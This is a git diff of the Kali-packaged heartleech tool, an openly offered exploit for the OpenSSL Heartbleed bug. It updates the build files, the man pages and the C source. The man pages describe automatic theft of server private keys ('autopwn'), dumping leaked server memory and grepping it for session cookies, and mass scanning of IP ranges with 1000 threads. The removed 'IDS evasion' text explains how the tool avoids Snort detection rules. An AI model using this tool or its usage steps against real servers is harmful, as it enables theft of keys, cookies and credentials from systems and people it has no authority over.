diff --git a/Makefile b/Makefile
index e169417..7e38554 100644
--- a/Makefile
+++ b/Makefile
@@ -1,6 +1,6 @@
 
 
-heartleech: heartleech.c ../openssl-1.0.1f/ssl/t1_lib.c
-	gcc -I ../openssl-1.0.1f/include -L ../openssl-1.0.1f/out32 -lssleay32 -leay32 -o heartleech heartleech.c
+heartleech: heartleech.c
+	gcc -I../openssl/include -L../openssl -lcrypto -lssl -lcrypto -ldl -lpthread -o heartleech heartleech.c
 
 
diff --git a/bin/macosx/heartleech b/bin/macosx/heartleech
index 99d43d1..b0ec0fe 100755
Binary files a/bin/macosx/heartleech and b/bin/macosx/heartleech differ
diff --git a/debian/changelog b/debian/changelog
index 0a6fdbc..66faa01 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,9 @@
+heartleech (1.0.0i+git20140606.1.3ab1d60-0kali1) UNRELEASED; urgency=low
+
+  * New upstream snapshot.
+
+ -- Kali Janitor <janitor@kali.org>  Sun, 15 May 2022 14:56:36 -0000
+
 heartleech (0~20140515-0kali6) kali-dev; urgency=medium
 
   [ Ben Wilson ]
diff --git a/debian/patches/dlopen_libpcre_so_3.patch b/debian/patches/dlopen_libpcre_so_3.patch
index 4d571c4..bb1c598 100644
--- a/debian/patches/dlopen_libpcre_so_3.patch
+++ b/debian/patches/dlopen_libpcre_so_3.patch
@@ -7,8 +7,10 @@ Description: Use libpcre.so.3 instead of libpcre.so
 Bug: https://github.com/robertdavidgraham/heartleech/issues/28
 Author: Raphaƫl Hertzog <buxy@kali.org>
 
---- a/heartleech.c
-+++ b/heartleech.c
+Index: heartleech/heartleech.c
+===================================================================
+--- heartleech.orig/heartleech.c
++++ heartleech/heartleech.c
 @@ -457,7 +457,7 @@ load_pcre(void)
      void *h;
      const char *library_names[] = {
diff --git a/heartleech.8 b/heartleech.8
index dd85fa8..26ba5f3 100644
--- a/heartleech.8
+++ b/heartleech.8
@@ -7,18 +7,21 @@
 \fBheartleech\fR \- Exploits OpenSSL heartbleed vulnerability
 .
 .SH "SYNOPSIS"
-heartleech \fIhost\fR [\-p\fIport\fR] [\-\-dump \fIfilename\fR] [\-\-autopwn]
+heartleech \fIhost\fR [\-\-p \fIport\fR] [\-\-dump \fIfilename\fR] [\-\-autopwn] [\-\-threads \fIn\fR]
 .
 .P
 heartleech \-\-read \fIfilename\fR \-\-cert \fIcertficate\fR
 .
+.P
+heartleech \-\-scanlist \fIfile\fR
+.
 .SH "DESCRIPTION"
 \fBheartleech\fR exploits the well\-known "heartbleed" bug in <= OpenSSL\-1\.0\.1f\. It has a number of features that improve over other heartbleed exploits, such as automatically extracting the SSL private\-key (autopwn)\.
 .
 .SH "OPTIONS"
 .
 .IP "\(bu" 4
-\fB<host>\fR: the target\'s name, IPv4 address, or IPv6 address\.
+\fB<host>\fR: the target\'s name, IPv4 address, or IPv6 address\. IPv4 ranges separated by a dash work\. This can optionally have a port as part of the name using a colon (e\.g\. \fBwww\.google\.com:25\fR)\. Will try to use STARTTLS on appropriate ports instead of raw SSL\.
 .
 .IP "\(bu" 4
 \fB\-\-autopwn\fR: sets "auto\-pwn" mode, which automatically searches the bleeding buffers for the private\-key\. If the private\-key is found, it will be printed to \fIstdout\fR, and the program will exit\.
@@ -98,14 +101,38 @@ $ grep \-iobUaP "Cookie:\.*\en" bleed\.bin
 .
 .IP "" 0
 .
-.SH "IDS EVASION"
-Soon after the Heartbleed vulnerability was announced, many people published \'rules\' for Snort\-like intrusion\-detection engines\. These rules all trigger on the pattern |18 03| in the first two bytes of the TCP payloads\.
-.
 .P
-By default, this program avoids putting that pattern in the first two bytes\. Instead, it tries to put those bytes elsewhere in the payload\. Thus, this program should genrally avoid that sort of detection\.
+You can scan for vulnerable targets instead of dumping information:
+.
+.IP "" 4
+.
+.nf
+
+$ heartleech \-\-scanlist hostlist\.txt \-\-scan 10\.0\.0\.0\-10\.0\.0\.255:992 \-\-threads 1000
+.
+.fi
+.
+.IP "" 0
 .
 .P
-Note that this isn\'t complete IDS evasion\. The open\-source Bro program, and many commercial products, do a full SSL protocol decode, and therefore catch this exploit no matter where it is in the packet\. Also, by the time you read this, it\'s probable that the Snort\-like engines will have upgraded their code to support SSL decodes as well\.
+Hosts in the this file use the same format as other hostnames, meaning they can be ranges, and also have ports specified\. Scan speed is likely dictated by the number of threads you have\. You can have a lot of threads, but scanning will still be slower than \fBmasscan\fR\. The "verdict" from scanning is
+.
+.IP "" 4
+.
+.nf
+
+* `SAFE` if we know for certain the target is safe, because it either
+  doesn\'t support heartbeats at all, or is patched against the bug
+
+* `VULNERABLE` if we know for certain that the target is vulnerable,
+  because we got back a bleed
+
+* `INCONCLUSIVE` if we don\'t get a response \-\- which usually means that the
+  target is safe, but we can\'t tell for sure
+.
+.fi
+.
+.IP "" 0
 .
 .SH "SEE ALSO"
 masscan(8)
diff --git a/heartleech.8.html b/heartleech.8.html
index 64f78db..f818d5d 100644
--- a/heartleech.8.html
+++ b/heartleech.8.html
@@ -58,7 +58,6 @@
     <a href="#DESCRIPTION">DESCRIPTION</a>
     <a href="#OPTIONS">OPTIONS</a>
     <a href="#SIMPLE-EXAMPLES">SIMPLE EXAMPLES</a>
-    <a href="#IDS-EVASION">IDS EVASION</a>
     <a href="#SEE-ALSO">SEE ALSO</a>
     <a href="#AUTHORS">AUTHORS</a>
   </div>
@@ -76,10 +75,12 @@
 
 <h2 id="SYNOPSIS">SYNOPSIS</h2>
 
-<p>heartleech <var>host</var> [-p<var>port</var>] [--dump <var>filename</var>] [--autopwn]</p>
+<p>heartleech <var>host</var> [--p <var>port</var>] [--dump <var>filename</var>] [--autopwn] [--threads <var>n</var>]</p>
 
 <p>heartleech --read <var>filename</var> --cert <var>certficate</var></p>
 
+<p>heartleech --scanlist <var>file</var></p>
+
 <h2 id="DESCRIPTION">DESCRIPTION</h2>
 
 <p><strong>heartleech</strong> exploits the well-known "heartbleed" bug in &lt;= OpenSSL-1.0.1f.
@@ -89,7 +90,11 @@ such as automatically extracting the SSL private-key (autopwn).</p>
 <h2 id="OPTIONS">OPTIONS</h2>
 
 <ul>
-<li><p><code>&lt;host></code>: the target's name, IPv4 address, or IPv6 address.</p></li>
+<li><p><code>&lt;host></code>: the target's name, IPv4 address, or IPv6 address. IPv4 ranges
+separated by a dash work. This can
+optionally have a port as part of the name using a colon
+(e.g. <code>www.google.com:25</code>). Will try to use STARTTLS on appropriate ports
+instead of raw SSL.</p></li>
 <li><p><code>--autopwn</code>: sets "auto-pwn" mode, which automatically searches the bleeding
 buffers for the private-key. If the private-key is found, it will be
 printed to <var>stdout</var>, and the program will exit.</p></li>
@@ -171,21 +176,25 @@ to gigabytes in size:</p>
 $ grep -iobUaP "Cookie:.*\n" bleed.bin
 </code></pre>
 
-<h2 id="IDS-EVASION">IDS EVASION</h2>
+<p>You can scan for vulnerable targets instead of dumping information:</p>
+
+<pre><code>$ heartleech --scanlist hostlist.txt --scan 10.0.0.0-10.0.0.255:992 --threads 1000
+</code></pre>
 
-<p>Soon after the Heartbleed vulnerability was announced, many people published
-'rules' for Snort-like intrusion-detection engines. These rules all trigger
-on the pattern |18 03| in the first two bytes of the TCP payloads.</p>
+<p>Hosts in the this file use the same format as other hostnames, meaning they
+can be ranges, and also have ports specified. Scan speed is likely dictated by
+the number of threads you have. You can have a lot of threads, but scanning
+will still be slower than <code>masscan</code>. The "verdict" from scanning is</p>
 
-<p>By default, this program avoids putting that pattern in the first two bytes.
-Instead, it tries to put those bytes elsewhere in the payload. Thus, this
-program should genrally avoid that sort of detection.</p>
+<pre><code>* `SAFE` if we know for certain the target is safe, because it either 
+  doesn't support heartbeats at all, or is patched against the bug
 
-<p>Note that this isn't complete IDS evasion. The open-source Bro program,
-and many commercial products, do a full SSL protocol decode, and therefore
-catch this exploit no matter where it is in the packet. Also, by the time
-you read this, it's probable that the Snort-like engines will have upgraded
-their code to support SSL decodes as well.</p>
+* `VULNERABLE` if we know for certain that the target is vulnerable,
+  because we got back a bleed
+
+* `INCONCLUSIVE` if we don't get a response -- which usually means that the
+  target is safe, but we can't tell for sure
+</code></pre>
 
 <h2 id="SEE-ALSO">SEE ALSO</h2>
 
diff --git a/heartleech.8.markdown b/heartleech.8.markdown
index b6a67da..93ba1b3 100644
--- a/heartleech.8.markdown
+++ b/heartleech.8.markdown
@@ -3,10 +3,12 @@ heartleech(8) -- Exploits OpenSSL heartbleed vulnerability
 
 ## SYNOPSIS
 
-heartleech <host> [-p<port>] [--dump <filename>] [--autopwn]
+heartleech <host> [--p <port>] [--dump <filename>] [--autopwn] [--threads <n>]
 
 heartleech --read <filename> --cert <certficate> 
 
+heartleech --scanlist <file>
+
 ## DESCRIPTION
 
 **heartleech** exploits the well-known "heartbleed" bug in <= OpenSSL-1.0.1f.
@@ -15,7 +17,11 @@ such as automatically extracting the SSL private-key (autopwn).
 
 ## OPTIONS
 
-  * `<host>`: the target's name, IPv4 address, or IPv6 address.
+  * `<host>`: the target's name, IPv4 address, or IPv6 address. IPv4 ranges
+    separated by a dash work. This can
+    optionally have a port as part of the name using a colon
+    (e.g. `www.google.com:25`). Will try to use STARTTLS on appropriate ports
+    instead of raw SSL. 
 
   * `--autopwn`: sets "auto-pwn" mode, which automatically searches the bleeding
     buffers for the private-key. If the private-key is found, it will be
@@ -108,22 +114,24 @@ to gigabytes in size:
     $ heartleech www.example.com --dump bleed.bin --threads 6
     <ctrl-c>
     $ grep -iobUaP "Cookie:.*\n" bleed.bin
-
-## IDS EVASION
-
-Soon after the Heartbleed vulnerability was announced, many people published 
-'rules' for Snort-like intrusion-detection engines. These rules all trigger
-on the pattern |18 03| in the first two bytes of the TCP payloads.
-
-By default, this program avoids putting that pattern in the first two bytes.
-Instead, it tries to put those bytes elsewhere in the payload. Thus, this
-program should genrally avoid that sort of detection.
-
-Note that this isn't complete IDS evasion. The open-source Bro program,
-and many commercial products, do a full SSL protocol decode, and therefore
-catch this exploit no matter where it is in the packet. Also, by the time
-you read this, it's probable that the Snort-like engines will have upgraded
-their code to support SSL decodes as well.
+    
+You can scan for vulnerable targets instead of dumping information:
+
+    $ heartleech --scanlist hostlist.txt --scan 10.0.0.0-10.0.0.255:992 --threads 1000
+    
+Hosts in the this file use the same format as other hostnames, meaning they
+can be ranges, and also have ports specified. Scan speed is likely dictated by
+the number of threads you have. You can have a lot of threads, but scanning
+will still be slower than `masscan`. The "verdict" from scanning is 
+
+    * `SAFE` if we know for certain the target is safe, because it either 
+      doesn't support heartbeats at all, or is patched against the bug
+      
+    * `VULNERABLE` if we know for certain that the target is vulnerable,
+      because we got back a bleed
+      
+    * `INCONCLUSIVE` if we don't get a response -- which usually means that the
+      target is safe, but we can't tell for sure
 
 
 ## SEE ALSO
diff --git a/heartleech.c b/heartleech.c
index 02aa89e..8f3d096 100644
--- a/heartleech.c
+++ b/heartleech.c
@@ -790,11 +790,11 @@ rsa_gen(const BIGNUM *p, const BIGNUM *q, const BIGNUM *e)
 
     /* calculate d mod (p-1) */
     rsa->dmp1 = BN_new();
-    BN_mod(rsa->dmp1, rsa->d, rsa->p, ctx);
+    BN_mod(rsa->dmp1, rsa->d, p1, ctx);
 
     /* calculate d mod (q-1) */
     rsa->dmq1 = BN_new();
-    BN_mod(rsa->dmq1, rsa->d, rsa->q, ctx);
+    BN_mod(rsa->dmq1, rsa->d, q1, ctx);
 
     /* calculate inverse of q mod p */
     rsa->iqmp = BN_new();
@@ -2635,6 +2635,28 @@ target_add(struct TargetList *targets, const char *hostname)
 }
 
 
+/******************************************************************************
+ * Called by the configuration-reading function for processing options
+ * specified on the command-line, in configuration files, in environmental
+ * variables, and so forth.
+ ******************************************************************************/
+static void
+print_usage()
+{
+    printf("\n");
+    printf("usage:\n");
+    printf(" heartleech --scanlist <file> [--threads <n>]\n");
+    printf("   scans the listed targets for heartbleed vulnerability\n");
+    printf(" heartleech <hostname> --dump <file> [--threads <n>]\n");
+    printf("   aggressively dumps heartbleed info to file for later processing\n");
+    printf(" heartleech --cert <cert> --read <file>\n");
+    printf("   looks for matching private key in dump file\n");
+    printf(" heartleech <hostname> --autopwn [--threads <n>]\n");
+    printf("   automatically scans vulnerable host for private key\n");
+    printf("use '-d' option to debug what's going wrong\n");
+    exit(1);
+}
+
 /******************************************************************************
  * Called by the configuration-reading function for processing options
  * specified on the command-line, in configuration files, in environmental
@@ -2666,6 +2688,9 @@ heartleech_set_parameter(struct DumpArgs *args,
         memcpy(args->dump_filename, value, strlen(value)+1);
         args->op = Op_Dump;
         return 1;
+    } else if (EQUALS("help", name)) {
+        print_usage();
+        return 0;
     } else if (EQUALS("ipv4", name)) {
         args->ip_ver = 4;
         return 0;
@@ -2844,7 +2869,7 @@ read_configuration(struct DumpArgs *args, int argc, char *argv[])
          * -t www.google.com
          */
         c = argv[i][1];
-        if (c == 'd' || c == 'a' || c == 'S')
+        if (c == 'd' || c == 'a' || c == 'S' || c == 'h' || c == '?')
             ;
         else if (argv[i][2] == '\0') {
             arg = argv[++i];
@@ -2869,6 +2894,9 @@ read_configuration(struct DumpArgs *args, int argc, char *argv[])
             case 'p': heartleech_set_parameter(args, "port", arg); break;
             case 'S': heartleech_set_parameter(args, "rand", arg); break;
             case 'v': heartleech_set_parameter(args, "ipver", arg); break;
+            case '?': heartleech_set_parameter(args, "help", arg); break;
+            case 'h': heartleech_set_parameter(args, "help", arg); break;
+            case 'H': heartleech_set_parameter(args, "help", arg); break;
             default:
                 fprintf(stderr, "[-] -%c: unknown argument\n", c);
                 exit(1);
@@ -3079,11 +3107,15 @@ main(int argc, char *argv[])
     args.cfg_loopcount = 1000000;
     args.timeout = 6;
     
-    fprintf(stderr, "\n--- heartleech/1.0.0h ---\n");
+    fprintf(stderr, "\n--- heartleech/1.0.0i ---\n");
     fprintf(stderr, "https://github.com/robertdavidgraham/heartleech\n");
 
-    load_pcre();
-
+    /*
+     * NOT HERE YET
+     * In the future, I'm going to load PCRE and search the dumped data for
+     * patterns, such as as Cookies and passwords
+     */
+    //load_pcre();
     //pattern_add(&args.patterns, "[a-zA-Z]*[sS][eE][sS][sS][iI][oO][nN][a-zA-Z0-9=]*;");
     //pattern_add(&args.patterns, "ASPSESSION[A-Z]*=[A-Z]*;");
 
@@ -3093,13 +3125,7 @@ main(int argc, char *argv[])
      */
     if (argc <= 1 ) {
     usage:
-        printf("\n");
-        printf("usage:\n heartleech <hostname> -f<filename>"
-               " [-p<port>] ...\n");
-        printf(" <hostname> is a DNS name or IP address of the target\n");
-        printf(" <filename> is where the heartbleed information is stored\n");
-        printf(" <port> is the port number, defaulting to 443\n");
-        return 1;
+        print_usage();
     }
 
     /*
@@ -3145,7 +3171,11 @@ main(int argc, char *argv[])
      * Open the output/dump file.
      */
     if (args.dump_filename && args.fp == NULL) {
-        args.fp = fopen(args.dump_filename, "ab+");
+        if (strncmp(args.dump_filename, "-", strlen(args.dump_filename)) == 0) {
+            args.fp = stdout;
+        } else {
+            args.fp = fopen(args.dump_filename, "ab+");
+        }
         if (args.fp == NULL) {
             perror(args.dump_filename);
             return -1;
diff --git a/heartleech.xcodeproj/project.pbxproj b/heartleech.xcodeproj/project.pbxproj
index 4c5b21e..1df3abd 100644
--- a/heartleech.xcodeproj/project.pbxproj
+++ b/heartleech.xcodeproj/project.pbxproj
@@ -25,6 +25,7 @@
 /* End PBXCopyFilesBuildPhase section */
 
 /* Begin PBXFileReference section */
+		117D65C8192683800009579F /* heartleech.8.markdown */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = heartleech.8.markdown; sourceTree = "<group>"; };
 		11A327C318FDCCA900142404 /* heartleech */ = {isa = PBXFileReference; explicitFileType = "compiled.mach-o.executable"; includeInIndex = 0; path = heartleech; sourceTree = BUILT_PRODUCTS_DIR; };
 		11A327DB18FDCE4600142404 /* heartleech.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = heartleech.c; sourceTree = "<group>"; };
 		11B0B49219031D24004C2CCA /* libssl.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libssl.a; path = ../openssl/libssl.a; sourceTree = "<group>"; };
@@ -48,6 +49,7 @@
 		11A327B818FDCCA900142404 = {
 			isa = PBXGroup;
 			children = (
+				117D65C8192683800009579F /* heartleech.8.markdown */,
 				11B0B4961905CC28004C2CCA /* README.md */,
 				11B0B49419031D35004C2CCA /* libcrypto.a */,
 				11B0B49219031D24004C2CCA /* libssl.a */,